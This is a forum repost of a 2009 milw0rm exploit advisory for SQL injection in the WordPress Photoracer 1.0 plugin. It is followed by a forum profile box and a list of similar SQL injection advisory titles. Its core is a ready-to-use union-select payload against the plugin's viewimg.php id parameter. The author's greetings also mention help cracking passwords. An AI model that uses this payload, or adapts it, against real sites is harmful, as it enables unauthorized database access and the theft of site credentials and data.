- Code:
Wordpress Photoracer Plugin => SQL injection
http://wordpress.org/extend/plugins/photoracer/
Author: Kacper
Website: http://devilteam.pl/
Pozdrawiam wszystkich z huba dc++, oraz wszystkich z forum,
Pozdro: Ratman, Kopaczka, FDJ
Elo: dla GLOBUSa za pomoc w crackowaniu hasel.
Vuln:
http://site.pl/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+0,1,2,3,4,user(),6,7,8--
big thanks str0ke for you!
be safe all :)
# milw0rm.com [2009-06-15]
WordPress Plugin Photoracer 1.0 (id) SQL Injection Vulnerability
Foxi- Admin
- Posts : 92
Reputation : -1
Join date : 2009-07-08
» WebLeague 2.2.0 (profile.php) SQL Injection Vulnerability
» Ger Versluis 2000 5.5 24 SITE_fiche.php SQL Injection Vulnerability
» Basilic 1.5.13 (index.php idAuthor) SQL Injection Vulnerability
» GBook 1.6 (mes_id) Remote SQL Injection Vulnerability
» SaphpLesson v4.0 (Auth Bypass) SQL Injection Vulnerability
» Ger Versluis 2000 5.5 24 SITE_fiche.php SQL Injection Vulnerability
» Basilic 1.5.13 (index.php idAuthor) SQL Injection Vulnerability
» GBook 1.6 (mes_id) Remote SQL Injection Vulnerability
» SaphpLesson v4.0 (Auth Bypass) SQL Injection Vulnerability